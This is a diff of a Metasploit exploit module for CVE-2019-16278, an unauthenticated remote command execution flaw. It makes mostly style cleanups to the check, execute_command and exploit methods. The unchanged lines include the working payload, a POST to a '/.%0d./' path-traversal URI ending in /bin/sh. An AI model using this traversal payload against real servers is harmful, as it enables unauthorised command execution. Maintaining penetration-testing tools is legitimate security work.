@@ -31,7 +31,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
         ],
         'Platform' => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
         'Targets' => [
           [
             'Automatic (Unix In-Memory)',
@@ -66,11 +65,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path),
+      'uri' => normalize_uri(target_uri.path)
     })
 
     unless res
-      vprint_error("Connection failed")
+      vprint_error('Connection failed')
       return CheckCode::Unknown
     end
 
@@ -84,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'),
@@ -95,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # These CheckCodes are allowed to pass automatically
-    checkcodes = [
+    [
       CheckCode::Appears,
       CheckCode::Vulnerable
     ]
